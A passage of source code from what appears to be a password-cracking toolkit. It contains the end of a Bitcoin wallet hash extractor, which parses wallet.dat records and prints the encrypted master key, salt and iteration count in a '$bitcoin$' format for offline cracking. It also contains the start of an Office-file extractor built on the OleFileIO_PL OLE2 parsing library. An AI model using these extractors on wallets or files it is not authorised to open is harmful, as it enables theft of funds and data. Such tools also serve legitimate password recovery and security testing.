'r').read() 336 | return md5_2(fichier) 337 | 338 | 339 | class KEY: 340 | 341 | def __init__ (self): 342 | self.prikey = None 343 | self.pubkey = None 344 | 345 | def generate (self, secret=None): 346 | if secret: 347 | exp = int ('0x' + secret.encode ('hex'), 16) 348 | self.prikey = ecdsa.SigningKey.from_secret_exponent (exp, curve=secp256k1) 349 | else: 350 | self.prikey = ecdsa.SigningKey.generate (curve=secp256k1) 351 | self.pubkey = self.prikey.get_verifying_key() 352 | return self.prikey.to_der() 353 | 354 | def set_privkey (self, key): 355 | if len(key) == 279: 356 | seq1, rest = der.remove_sequence (key) 357 | integer, rest = der.remove_integer (seq1) 358 | octet_str, rest = der.remove_octet_string (rest) 359 | tag1, cons1, rest, = der.remove_constructed (rest) 360 | tag2, cons2, rest, = der.remove_constructed (rest) 361 | point_str, rest = der.remove_bitstring (cons2) 362 | self.prikey = ecdsa.SigningKey.from_string(octet_str, curve=secp256k1) 363 | else: 364 | self.prikey = ecdsa.SigningKey.from_der (key) 365 | 366 | def set_pubkey (self, key): 367 | key = key[1:] 368 | self.pubkey = ecdsa.VerifyingKey.from_string (key, curve=secp256k1) 369 | 370 | def get_privkey (self): 371 | _p = self.prikey.curve.curve.p () 372 | _r = self.prikey.curve.generator.order () 373 | _Gx = self.prikey.curve.generator.x () 374 | _Gy = self.prikey.curve.generator.y () 375 | encoded_oid2 = der.encode_oid (*(1, 2, 840, 10045, 1, 1)) 376 | encoded_gxgy = "\x04" + ("%64x" % _Gx).decode('hex') + ("%64x" % _Gy).decode('hex') 377 | param_sequence = der.encode_sequence ( 378 | ecdsa.der.encode_integer(1), 379 | der.encode_sequence ( 380 | encoded_oid2, 381 | der.encode_integer (_p), 382 | ), 383 | der.encode_sequence ( 384 | der.encode_octet_string("\x00"), 385 | der.encode_octet_string("\x07"), 386 | ), 387 | der.encode_octet_string (encoded_gxgy), 388 | der.encode_integer (_r), 389 | der.encode_integer (1), 390 | ); 391 | encoded_vk = "\x00\x04" + self.pubkey.to_string () 392 | return der.encode_sequence ( 393 | der.encode_integer (1), 394 | der.encode_octet_string (self.prikey.to_string ()), 395 | der.encode_constructed (0, param_sequence), 396 | der.encode_constructed (1, der.encode_bitstring (encoded_vk)), 397 | ) 398 | 399 | def get_pubkey (self): 400 | return "\x04" + self.pubkey.to_string() 401 | 402 | def sign (self, hash): 403 | sig = self.prikey.sign_digest (hash, sigencode=ecdsa.util.sigencode_der) 404 | return sig.encode('hex') 405 | 406 | def verify (self, hash, sig): 407 | return self.pubkey.verify_digest (sig, hash, sigdecode=ecdsa.util.sigdecode_der) 408 | 409 | def bool_to_int(b): 410 | if b: 411 | return 1 412 | return 0 413 | 414 | class BCDataStream(object): 415 | def __init__(self): 416 | self.input = None 417 | self.read_cursor = 0 418 | 419 | def clear(self): 420 | self.input = None 421 | self.read_cursor = 0 422 | 423 | def write(self, bytes): # Initialize with string of bytes 424 | if self.input is None: 425 | self.input = bytes 426 | else: 427 | self.input += bytes 428 | 429 | def map_file(self, file, start): # Initialize with bytes from file 430 | self.input = mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) 431 | self.read_cursor = start 432 | def seek_file(self, position): 433 | self.read_cursor = position 434 | def close_file(self): 435 | self.input.close() 436 | 437 | def read_string(self): 438 | # Strings are encoded depending on length: 439 | # 0 to 252 : 1-byte-length followed by bytes (if any) 440 | # 253 to 65,535 : byte'253' 2-byte-length followed by bytes 441 | # 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes 442 | # ... and the Bitcoin client is coded to understand: 443 | # greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string 444 | # ... but I don't think it actually handles any strings that big. 445 | if self.input is None: 446 | raise SerializationError("call write(bytes) before trying to deserialize") 447 | 448 | try: 449 | length = self.read_compact_size() 450 | except IndexError: 451 | raise SerializationError("attempt to read past end of buffer") 452 | 453 | return self.read_bytes(length) 454 | 455 | def write_string(self, string): 456 | # Length-encoded as with read-string 457 | self.write_compact_size(len(string)) 458 | self.write(string) 459 | 460 | def read_bytes(self, length): 461 | try: 462 | result = self.input[self.read_cursor:self.read_cursor + length] 463 | self.read_cursor += length 464 | return result 465 | except IndexError: 466 | raise SerializationError("attempt to read past end of buffer") 467 | 468 | return '' 469 | 470 | def read_boolean(self): return self.read_bytes(1)[0] != chr(0) 471 | def read_int16(self): return self._read_num(' -1: 674 | global addrtype 675 | oldaddrtype = addrtype 676 | addrtype = vers 677 | 678 | db = open_wallet(walletfile, writable=FillPool) 679 | 680 | json_db['keys'] = [] 681 | json_db['pool'] = [] 682 | json_db['tx'] = [] 683 | json_db['names'] = {} 684 | json_db['ckey'] = [] 685 | json_db['mkey'] = {} 686 | 687 | def item_callback(type, d): 688 | if type == "tx": 689 | json_db['tx'].append({"tx_id" : d['tx_id'], "txin" : d['txIn'], "txout" : d['txOut'], "tx_v" : d['txv'], "tx_k" : d['txk']}) 690 | 691 | elif type == "name": 692 | json_db['names'][d['hash']] = d['name'] 693 | 694 | elif type == "version": 695 | json_db['version'] = d['version'] 696 | 697 | elif type == "minversion": 698 | json_db['minversion'] = d['minversion'] 699 | 700 | elif type == "setting": 701 | if not json_db.has_key('settings'): json_db['settings'] = {} 702 | json_db["settings"][d['setting']] = d['value'] 703 | 704 | elif type == "defaultkey": 705 | json_db['defaultkey'] = public_key_to_bc_address(d['key']) 706 | 707 | elif type == "key": 708 | addr = public_key_to_bc_address(d['public_key']) 709 | compressed = d['public_key'][0] != '\04' 710 | sec = SecretToASecret(PrivKeyToSecret(d['private_key']), compressed) 711 | hexsec = ASecretToSecret(sec).encode('hex') 712 | private_keys.append(sec) 713 | json_db['keys'].append({'addr' : addr, 'sec' : sec, 'hexsec' : hexsec, 'secret' : hexsec, 'pubkey':d['public_key'].encode('hex'), 'compressed':compressed, 'private':d['private_key'].encode('hex')}) 714 | 715 | elif type == "wkey": 716 | if not json_db.has_key('wkey'): json_db['wkey'] = [] 717 | json_db['wkey']['created'] = d['created'] 718 | 719 | elif type == "pool": 720 | """ d['n'] = kds.read_int64() 721 | d['nVersion'] = vds.read_int32() 722 | d['nTime'] = vds.read_int64() 723 | d['public_key'] = vds.read_bytes(vds.read_compact_size())""" 724 | try: 725 | json_db['pool'].append({'n': d['n'], 'addr': public_key_to_bc_address(d['public_key']), 'addr2': public_key_to_bc_address(d['public_key'].decode('hex')), 'addr3': public_key_to_bc_address(d['public_key'].encode('hex')), 'nTime' : d['nTime'], 'nVersion' : d['nVersion'], 'public_key_hex' : d['public_key'] }) 726 | except: 727 | json_db['pool'].append({'n': d['n'], 'addr': public_key_to_bc_address(d['public_key']), 'nTime' : d['nTime'], 'nVersion' : d['nVersion'], 'public_key_hex' : d['public_key'].encode('hex') }) 728 | 729 | elif type == "acc": 730 | json_db['acc'] = d['account'] 731 | sys.stdout.write("Account %s (current key: %s)" % (d['account'], public_key_to_bc_address(d['public_key']))) 732 | 733 | elif type == "acentry": 734 | json_db['acentry'] = (d['account'], d['nCreditDebit'], d['otherAccount'], time.ctime(d['nTime']), d['n'], d['comment']) 735 | 736 | elif type == "bestblock": 737 | pass 738 | # json_db['bestblock'] = d['hashes'][0][::-1].encode('hex_codec') 739 | 740 | elif type == "ckey": 741 | crypted = True 742 | compressed = d['public_key'][0] != '\04' 743 | json_db['keys'].append({ 'pubkey': d['public_key'].encode('hex'), 'addr': public_key_to_bc_address(d['public_key']), 'encrypted_privkey': d['encrypted_private_key'].encode('hex_codec'), 'compressed':compressed}) 744 | 745 | elif type == "mkey": 746 | json_db['mkey']['nID'] = d['nID'] 747 | json_db['mkey']['encrypted_key'] = d['encrypted_key'].encode('hex_codec') 748 | json_db['mkey']['salt'] = d['salt'].encode('hex_codec') 749 | json_db['mkey']['nDerivationMethod'] = d['nDerivationMethod'] 750 | json_db['mkey']['nDerivationIterations'] = d['nDerivationIterations'] 751 | json_db['mkey']['otherParams'] = d['otherParams'] 752 | 753 | if passphrase: 754 | res = crypter.SetKeyFromPassphrase(passphrase, d['salt'], d['nDerivationIterations'], d['nDerivationMethod']) 755 | if res == 0: 756 | logging.error("Unsupported derivation method") 757 | sys.exit(1) 758 | masterkey = crypter.Decrypt(d['encrypted_key']) 759 | crypter.SetKey(masterkey) 760 | 761 | else: 762 | json_db[type] = 'unsupported' 763 | 764 | parse_wallet(db, item_callback) 765 | 766 | 767 | nkeys = len(json_db['keys']) 768 | i = 0 769 | for k in json_db['keys']: 770 | i += 1 771 | addr = k['addr'] 772 | if addr in json_db['names'].keys(): 773 | k["label"] = json_db['names'][addr] 774 | k["reserve"] = 0 775 | 776 | db.close() 777 | 778 | crypted = 'salt' in json_db['mkey'] 779 | 780 | if not crypted: 781 | sys.stdout.write("%s : this wallet is not encrypted!" % walletfile) 782 | return -1 783 | 784 | for k in json_db['keys']: 785 | if k['compressed'] and 'secret' in k: 786 | k['secret'] += "01" 787 | 788 | if vers > -1: 789 | addrtype = oldaddrtype 790 | 791 | return {'crypted':crypted} 792 | 793 | 794 | 795 | if __name__ == '__main__': 796 | 797 | 798 | if len(sys.argv) < 2: 799 | print >> sys.stderr, "Usage: %s [bitcon wallet files]" % sys.argv[0] 800 | sys.exit(-1) 801 | 802 | for i in range(1, len(sys.argv)): 803 | filename = sys.argv[i] 804 | if read_wallet(json_db, filename, True, True, "", False) == -1: 805 | continue 806 | 807 | # Use btcrecover/btcrpass.py -> "Bitcoin Core" logic in case of problems 808 | # with the code in this file. 809 | minversion = json_db["minversion"] 810 | if minversion > max_version: 811 | sys.stderr.write("WARNING: %s has previously unseen minversion '%s'!\n" % 812 | (os.path.basename(filename), minversion)) 813 | 814 | cry_master = json_db['mkey']['encrypted_key'].decode('hex') 815 | cry_salt = json_db['mkey']['salt'].decode('hex') 816 | cry_rounds = json_db['mkey']['nDerivationIterations'] 817 | cry_method = json_db['mkey']['nDerivationMethod'] 818 | 819 | crypted = 'salt' in json_db['mkey'] 820 | 821 | if not crypted: 822 | print >> sys.stderr, "%s : this wallet is not encrypted" % os.path.basename(filename) 823 | continue 824 | 825 | for k in json_db['keys']: 826 | pass # dirty hack but it works! 827 | 828 | ckey = k['encrypted_privkey'] 829 | public_key = k['pubkey'] 830 | cry_master = json_db['mkey']['encrypted_key'] 831 | cry_salt = json_db['mkey']['salt'] 832 | 833 | sys.stdout.write("$bitcoin$%s$%s$%s$%s$%s$%s$%s$%s$%s\n" % 834 | (len(cry_master), cry_master, len(cry_salt), 835 | cry_salt, cry_rounds, len(ckey), ckey, len(public_key), 836 | public_key)) 837 | -------------------------------------------------------------------------------- /office2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: latin-1 -*- 3 | """ 4 | OleFileIO_PL: 5 | Module to read Microsoft OLE2 files (also called Structured Storage or 6 | Microsoft Compound Document File Format), such as Microsoft Office 7 | documents, Image Composer and FlashPix files, Outlook messages, ... 8 | 9 | version 0.23 2012-07-25 Philippe Lagadec - http://www.decalage.info 10 | 11 | Project website: http://www.decalage.info/python/olefileio 12 | 13 | Improved version of the OleFileIO module from PIL library v1.1.6 14 | See: http://www.pythonware.com/products/pil/index.htm 15 | 16 | The Python Imaging Library (PIL) is 17 | Copyright (c) 1997-2005 by Secret Labs AB 18 | Copyright (c) 1995-2005 by Fredrik Lundh 19 | OleFileIO_PL changes are Copyright (c) 2005-2012 by Philippe Lagadec 20 | 21 | See source code and LICENSE.txt for information on usage and redistribution. 22 | 23 | WARNING: THIS IS (STILL) WORK IN PROGRESS. 24 | """ 25 | 26 | __author__ = "Fredrik Lundh (Secret Labs AB), Philippe Lagadec" 27 | __date__ = "2012-07-25" 28 | __version__ = '0.23' 29 | 30 | #--- LICENSE ------------------------------------------------------------------ 31 | 32 | # OleFileIO_PL is an improved version of the OleFileIO module from the 33 | # Python Imaging Library (PIL). 34 | 35 | # OleFileIO_PL changes are Copyright (c) 2005-2012 by Philippe Lagadec 36 | # 37 | # The Python Imaging Library (PIL) is 38 | # Copyright (c) 1997-2005 by Secret Labs AB 39 | # Copyright (c) 1995-2005 by Fredrik Lundh 40 | # 41 | # By obtaining, using, and/or copying this software and/or its associated 42 | # documentation, you agree that you have read, understood, and will comply with 43 | # the following terms and conditions: 44 | # 45 | # Permission to use, copy, modify, and distribute this software and its 46 | # associated documentation for any purpose and without fee is hereby granted, 47 | # provided that the above copyright notice appears in all copies, and that both 48 | # that copyright notice and this permission notice appear in supporting 49 | # documentation, and that the name of Secret Labs AB or the author(s) not be used 50 | # in advertising or publicity pertaining to distribution of the software 51 | # without specific, written prior permission. 52 | # 53 | # SECRET LABS AB AND THE AUTHORS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS 54 | # SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. 55 | # IN NO EVENT SHALL SECRET LABS AB OR THE AUTHORS BE LIABLE FOR ANY SPECIAL, 56 | # INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM 57 | # LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR 58 | # OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR 59 | # PERFORMANCE OF THIS SOFTWARE. 60 | 61 | #----------------------------------------------------------------------------- 62 | # CHANGELOG: (only OleFileIO_PL changes compared to PIL 1.1.6) 63 | # 2005-05-11 v0.10 PL: - a few fixes for Python 2.4 compatibility 64 | # (all changes flagged with [PL]) 65 | # 2006-02-22 v0.11 PL: - a few fixes for some Office 2003 documents which raise 66 | # exceptions in _OleStream.__init__() 67 | # 2006-06-09 v0.12 PL: - fixes for files above 6.8MB (DIFAT in loadfat) 68 | # - added some constants 69 | # - added header values checks 70 | # - added some docstrings 71 | # - getsect: bugfix in case sectors >512 bytes 72 | # - getsect: added conformity checks 73 | # - DEBUG_MODE constant to activate debug display 74 | # 2007-09-04 v0.13 PL: - improved/translated (lots of) comments 75 | # - updated license 76 | # - converted tabs to 4 spaces 77 | # 2007-11-19 v0.14 PL: - added OleFileIO._raise_defect() to adapt sensitivity 78 | # - improved _unicode() to use Python 2.x unicode support 79 | # - fixed bug in _OleDirectoryEntry 80 | # 2007-11-25 v0.15 PL: - added safety checks to detect FAT loops 81 | # - fixed _OleStream which didn't check stream size 82 | # - added/improved many docstrings and comments 83 | # - moved helper functions _unicode and _clsid out of 84 | # OleFileIO class 85 | # - improved OleFileIO._find() to add Unix path syntax 86 | # - OleFileIO._find() is now case-insensitive 87 | # - added get_type() and get_rootentry_name() 88 | # - rewritten loaddirectory and _OleDirectoryEntry 89 | # 2007-11-27 v0.16 PL: - added _OleDirectoryEntry.kids_dict 90 | # - added detection of duplicate filenames in storages 91 | # - added detection of duplicate references to streams 92 | # - added get_size() and exists() to _OleDirectoryEntry 93 | # - added isOleFile to check header before parsing 94 | # - added __all__ list to control public keywords in pydoc 95 | # 2007-12-04 v0.17 PL: - added _load_direntry to fix a bug in loaddirectory 96 | # - improved _unicode(), added workarounds for Python <2.3 97 | # - added set_debug_mode and -d option to set debug mode 98 | # - fixed bugs in OleFileIO.open and _OleDirectoryEntry 99 | # - added safety check in main for large or binary 100 | # properties 101 | # - allow size>0 for storages for some implementations 102 | # 2007-12-05 v0.18 PL: - fixed several bugs in handling of FAT, MiniFAT and 103 | # streams 104 | # - added option '-c' in main to check all streams 105 | # 2009-12-10 v0.19 PL: - bugfix for 32 bit arrays on 64 bits platforms 106 | # (thanks to Ben G. and Martijn for reporting the bug) 107 | # 2009-12-11 v0.20 PL: - bugfix in OleFileIO.open when filename is not plain str 108 | # 2010-01-22 v0.21 PL: - added support for big-endian CPUs such as PowerPC Macs 109 | # 2012-02-16 v0.22 PL: - fixed bug in getproperties, patch by chuckleberryfinn 110 | # (https://bitbucket.org/decalage/olefileio_pl/issue/7) 111 | # - added close method to OleFileIO (fixed issue #2) 112 | # 2012-07-25 v0.23 PL: - added support for file-like objects (patch by mete0r_kr) 113 | 114 | 115 | #----------------------------------------------------------------------------- 116 | # TODO (for version 1.0): 117 | # - TESTS with Linux, MacOSX, Python 1.5.2, various files, PIL, ... 118 | # - add underscore to each private method, to avoid their display in 119 | # pydoc/epydoc documentation 120 | # - replace all raised exceptions with _raise_defect (at least in OleFileIO) 121 | # - merge code from _OleStream and OleFileIO.getsect to read sectors 122 | # (maybe add a class for FAT and MiniFAT ?) 123 | # - add method to check all streams (follow sectors chains without storing all 124 | # stream in memory, and report anomalies) 125 | # - use _OleDirectoryEntry.kids_dict to improve _find and _list ? 126 | # - fix Unicode names handling (find some way to stay compatible with Py1.5.2) 127 | # => if possible avoid converting names to Latin-1 128 | # - review DIFAT code: fix handling of DIFSECT blocks in FAT (not stop) 129 | # - rewrite OleFileIO.getproperties 130 | # - improve docstrings to show more sample uses 131 | # - see also original notes and FIXME below 132 | # - remove all obsolete FIXMEs 133 | 134 | # IDEAS: 135 | # - allow _raise_defect to raise different exceptions, not only IOError 136 | # - provide a class with named attributes to get well-known properties of 137 | # MS Office documents (title, author, ...) ? 138 | # - in OleFileIO._open and _OleStream, use size=None instead of 0x7FFFFFFF for 139 | # streams with unknown size 140 | # - use arrays of int instead of long integers for FAT/MiniFAT, to improve 141 | # performance and reduce memory usage ? (possible issue with values >2^31) 142 | # - provide tests with unittest (may need write support to create samples) 143 | # - move all debug code (and maybe dump methods) to a separate module, with 144 | # a class which inherits OleFileIO ? 145 | # - fix docstrings to follow epydoc format 146 | # - add support for 4K sectors ? 147 | # - add support for big endian byte order ? 148 | # - create a simple OLE explorer with wxPython 149 | 150 | # FUTURE EVOLUTIONS to add write support: 151 | # 1) add ability to write a stream back on disk from StringIO (same size, no 152 | # change in FAT/MiniFAT). 153 | # 2) rename a stream/storage if it doesn't change the RB tree 154 | # 3) use rbtree module to update the red-black tree + any rename 155 | # 4) remove a stream/storage: free sectors in FAT/MiniFAT 156 | # 5) allocate new sectors in FAT/MiniFAT 157 | # 6) create new storage/stream 158 | #----------------------------------------------------------------------------- 159 | 160 | # 161 | # THIS IS WORK IN PROGRESS 162 | # 163 | # The Python Imaging Library 164 | # $Id: OleFileIO.py 2339 2005-03-25 08:02:17Z fredrik $ 165 | # 166 | # stuff to deal with OLE2 Structured Storage files. this module is 167 | # used by PIL to read Image Composer and FlashPix files, but can also 168 | # be used to read other files of this type. 169 | # 170 | # History: 171 | # 1997-01-20 fl Created 172 | # 1997-01-22 fl Fixed 64-bit portability quirk 173 | # 2003-09-09 fl Fixed typo in OleFileIO.loadfat (noted by Daniel Haertle) 174 | # 2004-02-29 fl Changed long hex constants to signed integers 175 | # 176 | # Notes: 177 | # FIXME: sort out sign problem (eliminate long hex constants) 178 | # FIXME: change filename to use "a/b/c" instead of ["a", "b", "c"] 179 | # FIXME: provide a glob mechanism function (using fnmatchcase) 180 | # 181 | # Literature: 182 | # 183 | # "FlashPix Format Specification, Appendix A", Kodak and Microsoft, 184 | # September 1996. 185 | # 186 | # Quotes: 187 | # 188 | # "If this document and functionality of the Software conflict, 189 | # the actual functionality of the Software represents the correct 190 | # functionality" -- Microsoft, in the OLE format specification 191 | # 192 | # Copyright (c) Secret Labs AB 1997. 193 | # Copyright (c) Fredrik Lundh 1997. 194 | # 195 | # See the README file for information on usage and redistribution. 196 | # 197 | 198 | #------------------------------------------------------------------------------ 199 | 200 | import struct, array, os.path, sys 201 | 202 | PY3 = sys.version_info[0] == 3 203 | 204 | if PY3: 205 | from io import BytesIO as StringIO 206 | else: 207 | from StringIO import StringIO 208 | 209 | #[PL] Define explicitly the public API to avoid private objects in pydoc: 210 | __all__ = ['OleFileIO', 'isOleFile'] 211 | 212 | #[PL] workaround to fix an issue with array item size on 64 bits systems: 213 | if array.array('L').itemsize == 4: 214 | # on 32 bits platforms, long integers in an array are 32 bits: 215 | UINT32 = 'L' 216 | elif array.array('I').itemsize == 4: 217 | # on 64 bits platforms, integers in an array are 32 bits: 218 | UINT32 = 'I' 219 | else: 220 | raise ValueError('Need to fix a bug with 32 bit arrays, please contact author...') 221 | 222 | 223 | #[PL] These workarounds were inspired from the Path module 224 | # (see http://www.jorendorff.com/articles/python/path/) 225 | #TODO: test with old Python versions 226 | 227 | #[PL] Experimental setting: if True, OLE filenames will be kept in Unicode 228 | # if False (default PIL behaviour), all filenames are converted to Latin-1. 229 | KEEP_UNICODE_NAMES = False 230 | 231 | #[PL] DEBUG display mode: False by default, use set_debug_mode() or "-d" on 232 | # command line to change it. 233 | DEBUG_MODE = False 234 | def debug_print(msg): 235 | print(msg) 236 | def debug_pass(msg): 237 | pass 238 | debug = debug_pass 239 | 240 | def set_debug_mode(debug_mode): 241 | """ 242 | Set debug mode on or off, to control display of debugging messages. 243 | mode: True or False 244 | """ 245 | global DEBUG_MODE, debug 246 | DEBUG_MODE = debug_mode 247 | if debug_mode: 248 | debug = debug_print 249 | else: 250 | debug = debug_pass 251 | 252 | #TODO: convert this to hex 253 | MAGIC = b'\320\317\021\340\241\261\032\341' 254 | 255 | #[PL]: added constants for Sector IDs (from AAF specifications) 256 | MAXREGSECT = 0xFFFFFFFA; # maximum SECT 257 | DIFSECT = 0xFFFFFFFC; # (-4) denotes a DIFAT sector in a FAT 258 | FATSECT = 0xFFFFFFFD; # (-3) denotes a FAT sector in a FAT 259 | ENDOFCHAIN = 0xFFFFFFFE; # (-2) end of a virtual stream chain 260 | FREESECT = 0xFFFFFFFF; # (-1) unallocated sector 261 | 262 | #[PL]: added constants for Directory Entry IDs (from AAF specifications) 263 | MAXREGSID = 0xFFFFFFFA; # maximum directory entry ID 264 | NOSTREAM = 0xFFFFFFFF; # (-1) unallocated directory entry 265 | 266 | #[PL] object types in storage (from AAF specifications) 267 | STGTY_EMPTY = 0 # empty directory entry (according to OpenOffice.org doc) 268 | STGTY_STORAGE = 1 # element is a storage object 269 | STGTY_STREAM = 2 # element is a stream object 270 | STGTY_LOCKBYTES = 3 # element is an ILockBytes object 271 | STGTY_PROPERTY = 4 # element is an IPropertyStorage object 272 | STGTY_ROOT = 5 # element is a root storage 273 | 274 | 275 | # 276 | # -------------------------------------------------------------------- 277 | # property types 278 | 279 | VT_EMPTY=0; VT_NULL=1; VT_I2=2; VT_I4=3; VT_R4=4; VT_R8=5; VT_CY=6; 280 | VT_DATE=7; VT_BSTR=8; VT_DISPATCH=9; VT_ERROR=10; VT_BOOL=11; 281 | VT_VARIANT=12; VT_UNKNOWN=13; VT_DECIMAL=14; VT_I1=16; VT_UI1=17; 282 | VT_UI2=18; VT_UI4=19; VT_I8=20; VT_UI8=21; VT_INT=22; VT_UINT=23; 283 | VT_VOID=24; VT_HRESULT=25; VT_PTR=26; VT_SAFEARRAY=27; VT_CARRAY=28; 284 | VT_USERDEFINED=29; VT_LPSTR=30; VT_LPWSTR=31; VT_FILETIME=64; 285 | VT_BLOB=65; VT_STREAM=66; VT_STORAGE=67; VT_STREAMED_OBJECT=68; 286 | VT_STORED_OBJECT=69; VT_BLOB_OBJECT=70; VT_CF=71; VT_CLSID=72; 287 | VT_VECTOR=0x1000; 288 | 289 | # 290 | # -------------------------------------------------------------------- 291 | # Some common document types (root.clsid fields) 292 | 293 | WORD_CLSID = "00020900-0000-0000-C000-000000000046" 294 | #TODO: check Excel, PPT, ... 295 | 296 | #[PL]: Defect levels to classify parsing errors - see OleFileIO._raise_defect() 297 | DEFECT_UNSURE = 10 # a case which looks weird, but not sure it's a defect 298 | DEFECT_POTENTIAL = 20 # a potential defect 299 | DEFECT_INCORRECT = 30 # an error according to specifications, but parsing 300 | # can go on 301 | DEFECT_FATAL = 40 # an error which cannot be ignored, parsing is 302 | # impossible 303 | 304 | 305 | #--- FUNCTIONS ---------------------------------------------------------------- 306 | 307 | def isOleFile (filename): 308 | """ 309 | Test if file is an OLE container (according to its header). 310 | filename: file name or path (str, unicode) 311 | return: True if OLE, False otherwise. 312 | """ 313 | f = open(filename, 'rb') 314 | header = f.read(len(MAGIC)) 315 | if header == MAGIC: 316 | return True 317 | else: 318 | return False 319 | 320 | 321 | #TODO: replace i16 and i32 with more readable struct.unpack equivalent 322 | def i16(c, o = 0): 323 | """ 324 | Converts a 2-bytes (16 bits) string to an integer. 325 | 326 | c: string containing bytes to convert 327 | o: offset of bytes to convert in string 328 | """ 329 | if isinstance(c[o], int): 330 | return c[o] + (c[o+1]<<8) 331 | return ord(c[o])+(ord(c[o+1])<<8) 332 | 333 | 334 | def i32(c, o = 0): 335 | """ 336 | Converts a 4-bytes (32 bits) string to an integer. 337 | 338 | c: string containing bytes to convert 339 | o: offset of bytes to convert in string 340 | """ 341 | if isinstance(c[o], int): 342 | return c[o] + (c[o+1]<<8) + (c[o+2]<<16) + (c[o+3]<<24) 343 | return int(ord(c[o])+(ord(c[o+1])<<8)+(ord(c[o+2])<<16)+(ord(c[o+3])<<24)) 344 | # [PL]: added int() because "<<" gives long int since Python 2.4 345 | 346 | 347 | def _clsid(clsid): 348 | """ 349 | Converts a CLSID to a human-readable string. 350 | clsid: string of length 16. 351 | """ 352 | assert len(clsid) == 16 353 | if clsid == "\0" * len(clsid): 354 | return "" 355 | return (("%08X-%04X-%04X-%02X%02X-" + "%02X" * 6) % 356 | ((i32(clsid, 0), i16(clsid, 4), i16(clsid, 6)) + 357 | tuple(map(ord, clsid[8:16])))) 358 | 359 | 360 | 361 | # UNICODE support for Old Python versions: 362 | # (necessary to handle storages/streams names which use Unicode) 363 | 364 | try: 365 | # is Unicode supported ? 366 | def _unicode(s, errors='replace'): 367 | """ 368 | Map unicode string to Latin 1. (Python with Unicode support) 369 | 370 | s: UTF-16LE unicode string to convert to Latin-1 371 | errors: 'replace', 'ignore' or 'strict'. See Python doc for unicode() 372 | """ 373 | #TODO: test if it OleFileIO works with Unicode strings, instead of 374 | # converting to Latin-1. 375 | try: 376 | # First the string is converted to plain Unicode: 377 | # (assuming it is encoded as UTF-16 little-endian) 378 | u = s.decode('UTF-16LE', errors) 379 | if KEEP_UNICODE_NAMES: 380 | return u 381 | else: 382 | # Second the unicode string is converted to Latin-1 383 | return u.encode('latin_1', errors) 384 | except: 385 | # there was an error during Unicode to Latin-1 conversion: 386 | raise IOError('incorrect Unicode name') 387 | 388 | except NameError: 389 | def _unicode(s, errors='replace'): 390 | """ 391 | Map unicode string to Latin 1. (Python without native Unicode support) 392 | 393 | s: UTF-16LE unicode string to convert to Latin-1 394 | errors: 'replace', 'ignore' or 'strict'. (ignored in this version) 395 | """ 396 | # If the unicode function does not exist, we assume this is an old 397 | # Python version without Unicode support. 398 | # Null bytes are simply removed (this only works with usual Latin-1 399 | # strings which do not contain unicode characters>256): 400 | return filter(ord, s) # this is bullshit! 401 | 402 | 403 | 404 | #=== CLASSES ================================================================== 405 | 406 | #--- _OleStream --------------------------------------------------------------- 407 | 408 | class _OleStream(StringIO): 409 | """ 410 | OLE2 Stream 411 | 412 | Returns a read-only file object which can be used to read 413 | the contents of an OLE stream (instance of the StringIO class). 414 | To open a stream, use the openstream method in the OleFile class. 415 | 416 | This function can be used with either ordinary streams, 417 | or ministreams, depending on the offset, sectorsize, and 418 | fat table arguments. 419 | 420 | Attributes: 421 | - size: actual size of data stream, after it was opened. 422 | """ 423 | 424 | # FIXME: should store the list of sects obtained by following 425 | # the fat chain, and load new sectors on demand instead of 426 | # loading it all in one go. 427 | 428 | def __init__(self, fp, sect, size, offset, sectorsize, fat, filesize): 429 | """ 430 | Constructor for _OleStream class. 431 | 432 | fp : file object, the OLE container or the MiniFAT stream 433 | sect : sector index of first sector in the stream 434 | size : total size of the stream 435 | offset : offset in bytes for the first FAT or MiniFAT sector 436 | sectorsize: size of one sector 437 | fat : array/list of sector indexes (FAT or MiniFAT) 438 | filesize : size of OLE file (for debugging) 439 | return : a StringIO instance containing the OLE stream 440 | """ 441 | debug('_OleStream.__init__:') 442 | debug(' sect=%d (%X), size=%d, offset=%d, sectorsize=%d, len(fat)=%d, fp=%s' 443 | %(sect,sect,size,offset,sectorsize,len(fat), repr(fp))) 444 | #[PL] To detect malformed documents with FAT loops, we compute the 445 | # expected number of sectors in the stream: 446 | unknown_size = False 447 | if size==0x7FFFFFFF: 448 | # this is the case when called from OleFileIO._open(), and stream 449 | # size is not known in advance (for example when reading the 450 | # Directory stream). Then we can only guess maximum size: 451 | size = len(fat)*sectorsize 452 | # and we keep a record that size was unknown: 453 | unknown_size = True 454 | debug(' stream with UNKNOWN SIZE') 455 | nb_sectors = (size + (sectorsize-1)) / sectorsize 456 | nb_sectors = int(nb_sectors) 457 | # print('nb_sectors = %d' % nb_sectors) 458 | # This number should (at least) be less than the total number of 459 | # sectors in the given FAT: 460 | if nb_sectors > len(fat): 461 | 462 | raise IOError('malformed OLE document, stream too large') 463 | # optimization(?): data is first a list of strings, and join() is called 464 | # at the end to concatenate all in one string. 465 | # (this may not be really useful with recent Python versions) 466 | data = [] 467 | # if size is zero, then first sector index should be ENDOFCHAIN: 468 | if size == 0 and sect != ENDOFCHAIN: 469 | debug('size == 0 and sect != ENDOFCHAIN:') 470 | raise IOError('incorrect OLE sector index for empty stream') 471 | #[PL] A fixed-length for loop is used instead of an undefined while 472 | # loop to avoid DoS attacks: 473 | for i in range(nb_sectors): 474 | # Sector index may be ENDOFCHAIN, but only if size was unknown 475 | if sect == ENDOFCHAIN: 476 | if unknown_size: 477 | break 478 | else: 479 | # else this means that the stream is smaller than declared: 480 | debug('sect=ENDOFCHAIN before expected size') 481 | raise IOError('incomplete OLE stream') 482 | # sector index should be within FAT: 483 | if sect<0 or sect>=len(fat): 484 | debug('sect=%d (%X) / len(fat)=%d' % (sect, sect, len(fat))) 485 | debug('i=%d / nb_sectors=%d' %(i, nb_sectors)) 486 | ## tmp_data = string.join(data, "") 487 | ## f = open('test_debug.bin', 'wb') 